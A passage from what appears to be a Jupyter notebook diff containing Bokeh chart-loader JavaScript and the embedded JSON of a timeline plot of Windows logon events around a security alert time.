Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"2924\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"2924\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"3cac20eb-48ba-418b-a985-f8ae50ba1330\" data-root-id=\"3027\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"3f85b9af-f51a-4b7f-bf27-e5ba59c7307b\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"2929\"},{\"id\":\"2961\"}]},\"id\":\"3027\",\"type\":\"Column\"},{\"attributes\":{\"label\":{\"value\":\"4\"},\"renderers\":[{\"id\":\"3011\"}]},\"id\":\"3013\",\"type\":\"LegendItem\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"3067\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"source\":{\"id\":\"2925\"}},\"id\":\"2984\",\"type\":\"CDSView\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"3069\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"2927\"},\"glyph\":{\"id\":\"2991\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2992\"},\"view\":{\"id\":\"2994\"}},\"id\":\"2993\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"fill_color\":{\"value\":\"#440154\"},\"line_color\":{\"value\":\"#440154\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2981\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"3035\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"3042\",\"type\":\"Selection\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"3068\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#208F8C\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#208F8C\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3010\",\"type\":\"Scatter\"},{\"attributes\":{},\"id\":\"2966\",\"type\":\"DataRange1d\"},{\"attributes\":{},\"id\":\"3039\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"3043\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"3045\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"3070\",\"type\":\"YearsTicker\"},{\"attributes\":{\"fill_color\":{\"value\":\"#208F8C\"},\"line_color\":{\"value\":\"#208F8C\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2986\",\"type\":\"Circle\"},{\"attributes\":{\"overlay\":{\"id\":\"2996\"},\"x_range\":{\"id\":\"2932\"},\"y_range\":null},\"id\":\"2995\",\"type\":\"RangeTool\"},{\"attributes\":{\"source\":{\"id\":\"2925\"}},\"id\":\"3006\",\"type\":\"CDSView\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#208F8C\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#208F8C\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3009\",\"type\":\"Scatter\"},{\"attributes\":{\"data\":{\"x\":[1547527944020.0,1547527944020.0],\"y\":[0,3]},\"selected\":{\"id\":\"3044\"},\"selection_policy\":{\"id\":\"3045\"}},\"id\":\"3021\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#FDE724\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2992\",\"type\":\"Circle\"},{\"attributes\":{\"axis\":{\"id\":\"2972\"},\"ticker\":null},\"id\":\"2975\",\"type\":\"Grid\"},{\"attributes\":{\"source\":{\"id\":\"2927\"}},\"id\":\"2994\",\"type\":\"CDSView\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"3059\"},{\"id\":\"3060\"},{\"id\":\"3061\"},{\"id\":\"3062\"},{\"id\":\"3063\"},{\"id\":\"3064\"},{\"id\":\"3065\"},{\"id\":\"3066\"},{\"id\":\"3067\"},{\"id\":\"3068\"},{\"id\":\"3069\"},{\"id\":\"3070\"}]},\"id\":\"2973\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"source\":{\"id\":\"2926\"}},\"id\":\"2989\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"3044\",\"type\":\"Selection\"},{\"attributes\":{\"data_source\":{\"id\":\"2926\"},\"glyph\":{\"id\":\"2986\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2987\"},\"view\":{\"id\":\"2989\"}},\"id\":\"2988\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#208F8C\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#208F8C\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2987\",\"type\":\"Circle\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"3064\",\"type\":\"DaysTicker\"},{\"attributes\":{\"fill_color\":{\"value\":\"#FDE724\"},\"line_color\":{\"value\":\"#FDE724\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2991\",\"type\":\"Circle\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#440154\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3003\",\"type\":\"Scatter\"},{\"attributes\":{},\"id\":\"3040\",\"type\":\"Selection\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"3060\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"3055\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"3062\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"3056\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5,\"syncable\":false},\"id\":\"2996\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"3065\",\"type\":\"DaysTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"2925\"},\"glyph\":{\"id\":\"3003\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3004\"},\"view\":{\"id\":\"3006\"}},\"id\":\"3005\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"2978\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"2952\",\"type\":\"PanTool\"},{\"attributes\":{\"label\":{\"value\":\"5\"},\"renderers\":[{\"id\":\"3017\"}]},\"id\":\"3019\",\"type\":\"LegendItem\"},{\"attributes\":{\"data_source\":{\"id\":\"2925\"},\"glyph\":{\"id\":\"2981\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2982\"},\"view\":{\"id\":\"2984\"}},\"id\":\"2983\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"2948\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"3063\",\"type\":\"DaysTicker\"},{\"attributes\":{\"label\":{\"value\":\"3\"},\"renderers\":[{\"id\":\"3005\"}]},\"id\":\"3007\",\"type\":\"LegendItem\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"3061\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"2953\"}},\"id\":\"2949\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"3059\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"3054\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"3033\",\"type\":\"AllLabels\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#440154\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2982\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"2951\",\"type\":\"SaveTool\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"3000\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{},\"id\":\"3057\",\"type\":\"YearsTicker\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"3046\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"2950\",\"type\":\"ResetTool\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#440154\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3004\",\"type\":\"Scatter\"},{\"attributes\":{},\"id\":\"2968\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"3038\",\"type\":\"Selection\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"3066\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"source\":{\"id\":\"2926\"}},\"id\":\"3012\",\"type\":\"CDSView\"},{\"attributes\":{\"formatter\":{\"id\":\"2978\"},\"major_label_policy\":{\"id\":\"3035\"},\"ticker\":{\"id\":\"2973\"}},\"id\":\"2972\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"3048\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"2970\",\"type\":\"LinearScale\"},{\"attributes\":{\"data\":{\"Account\":[\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\"],\"LogonType\":[5,5,5,5,5,5,5,5,5,5,5],\"TargetLogonId\":[\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\"],\"TimeGenerated\":{\"__ndarray__\":\"AHCb8/6EdkIA0CX1/oR2QgBQCfb+hHZCABCzePiEdkIAUEV5+IR2QgAQTWn2hHZCAPDeafaEdkIAQE/J8oR2QgCgGfTyhHZCAJDayPeEdkIAsG3J94R2Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[11]},\"index\":[1,3,4,6,7,8,9,10,11,12,13],\"y_index\":[2,2,2,2,2,2,2,2,2,2,2]},\"selected\":{\"id\":\"3042\"},\"selection_policy\":{\"id\":\"3043\"}},\"id\":\"2927\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"below\":[{\"id\":\"2972\"},{\"id\":\"2977\"}],\"center\":[{\"id\":\"2975\"}],\"height\":120,\"renderers\":[{\"id\":\"2983\"},{\"id\":\"2988\"},{\"id\":\"2993\"}],\"title\":{\"id\":\"2962\"},\"toolbar\":{\"id\":\"2976\"},\"toolbar_location\":null,\"width\":900,\"x_range\":{\"id\":\"2964\"},\"x_scale\":{\"id\":\"2968\"},\"y_range\":{\"id\":\"2966\"},\"y_scale\":{\"id\":\"2970\"}},\"id\":\"2961\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"line_alpha\":0.1,\"line_color\":\"red\",\"line_dash\":[6],\"x\":{\"field\":\"x\"},\"y\":{\"field\":\"y\"}},\"id\":\"3023\",\"type\":\"Line\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"3052\",\"type\":\"DaysTicker\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"2928\"},{\"id\":\"2948\"},{\"id\":\"2949\"},{\"id\":\"2950\"},{\"id\":\"2951\"},{\"id\":\"2952\"}]},\"id\":\"2954\",\"type\":\"Toolbar\"},{\"attributes\":{\"data_source\":{\"id\":\"2926\"},\"glyph\":{\"id\":\"3009\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3010\"},\"view\":{\"id\":\"3012\"}},\"id\":\"3011\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"3041\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"2962\",\"type\":\"Title\"},{\"attributes\":{\"axis\":{\"id\":\"2940\"},\"minor_grid_line_alpha\":0.3,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"2943\",\"type\":\"Grid\"},{\"attributes\":{\"formatter\":{\"id\":\"3032\"},\"major_label_policy\":{\"id\":\"3030\"},\"ticker\":{\"id\":\"2945\"},\"visible\":false},\"id\":\"2944\",\"type\":\"LinearAxis\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"3053\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"3032\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"data\":{\"Account\":[\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\"],\"LogonType\":[4,4],\"TargetLogonId\":[\"0xfaac27\",\"0xf0c9d6\"],\"TimeGenerated\":{\"__ndarray__\":\"AEA88/6EdkIAIBxK/IR2Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[2]},\"index\":[0,5],\"y_index\":[1,1]},\"selected\":{\"id\":\"3040\"},\"selection_policy\":{\"id\":\"3041\"}},\"id\":\"2926\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#FDE724\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3015\",\"type\":\"Scatter\"},{\"attributes\":{\"end\":2.3333333333333335,\"start\":-0.3333333333333333},\"id\":\"2934\",\"type\":\"Range1d\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":\"10px\"},\"id\":\"2977\",\"type\":\"Title\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"3049\",\"type\":\"DaysTicker\"},{\"attributes\":{\"axis\":{\"id\":\"2944\"},\"dimension\":1,\"grid_line_color\":null,\"ticker\":null},\"id\":\"2947\",\"type\":\"Grid\"},{\"attributes\":{\"end\":1547530591064.3,\"start\":1547515271728.7},\"id\":\"2932\",\"type\":\"Range1d\"},{\"attributes\":{\"background_fill_alpha\":0.3,\"background_fill_color\":\"white\",\"border_line_alpha\":0.3,\"border_line_color\":\"red\",\"render_mode\":\"css\",\"text\":\"< Alert time\",\"text_alpha\":0.5,\"text_font_size\":\"8pt\",\"x\":1547527944020.0,\"y\":0,\"y_offset\":10},\"id\":\"3026\",\"type\":\"Label\"},{\"attributes\":{\"data_source\":{\"id\":\"3021\"},\"glyph\":{\"id\":\"3022\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3023\"},\"view\":{\"id\":\"3025\"}},\"id\":\"3024\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"2945\",\"type\":\"BasicTicker\"},{\"attributes\":{\"line_alpha\":0.5,\"line_color\":\"red\",\"line_dash\":[6],\"x\":{\"field\":\"x\"},\"y\":{\"field\":\"y\"}},\"id\":\"3022\",\"type\":\"Line\"},{\"attributes\":{},\"id\":\"3030\",\"type\":\"AllLabels\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#FDE724\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3016\",\"type\":\"Scatter\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"3046\"},{\"id\":\"3047\"},{\"id\":\"3048\"},{\"id\":\"3049\"},{\"id\":\"3050\"},{\"id\":\"3051\"},{\"id\":\"3052\"},{\"id\":\"3053\"},{\"id\":\"3054\"},{\"id\":\"3055\"},{\"id\":\"3056\"},{\"id\":\"3057\"}]},\"id\":\"2941\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"3050\",\"type\":\"DaysTicker\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@TimeGenerated\":\"datetime\"},\"tooltips\":[[\"LogonType\",\"@LogonType\"],[\"Account\",\"@Account\"],[\"TimeGenerated\",\"@TimeGenerated{%F %T.%3N}\"],[\"TargetLogonId\",\"@TargetLogonId\"]]},\"id\":\"2928\",\"type\":\"HoverTool\"},{\"attributes\":{\"end\":1547531229369.95,\"start\":1547514633423.05},\"id\":\"2964\",\"type\":\"Range1d\"},{\"attributes\":{\"click_policy\":\"hide\",\"items\":[{\"id\":\"3019\"},{\"id\":\"3013\"},{\"id\":\"3007\"}],\"label_text_font_size\":\"8pt\",\"location\":\"center\"},\"id\":\"3020\",\"type\":\"Legend\"},{\"attributes\":{\"below\":[{\"id\":\"2940\"}],\"center\":[{\"id\":\"2943\"},{\"id\":\"2947\"},{\"id\":\"3026\"}],\"height\":300,\"left\":[{\"id\":\"2944\"},{\"id\":\"3020\"}],\"min_border_left\":50,\"renderers\":[{\"id\":\"3005\"},{\"id\":\"3011\"},{\"id\":\"3017\"},{\"id\":\"3024\"}],\"title\":{\"id\":\"2930\"},\"toolbar\":{\"id\":\"2954\"},\"width\":900,\"x_range\":{\"id\":\"2932\"},\"x_scale\":{\"id\":\"2936\"},\"y_range\":{\"id\":\"2934\"},\"y_scale\":{\"id\":\"2938\"}},\"id\":\"2929\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"data_source\":{\"id\":\"2927\"},\"glyph\":{\"id\":\"3015\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3016\"},\"view\":{\"id\":\"3018\"}},\"id\":\"3017\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"active_multi\":{\"id\":\"2995\"},\"tools\":[{\"id\":\"2995\"}]},\"id\":\"2976\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"2938\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"2936\",\"type\":\"LinearScale\"},{\"attributes\":{\"data\":{\"Account\":[\"MSTICAle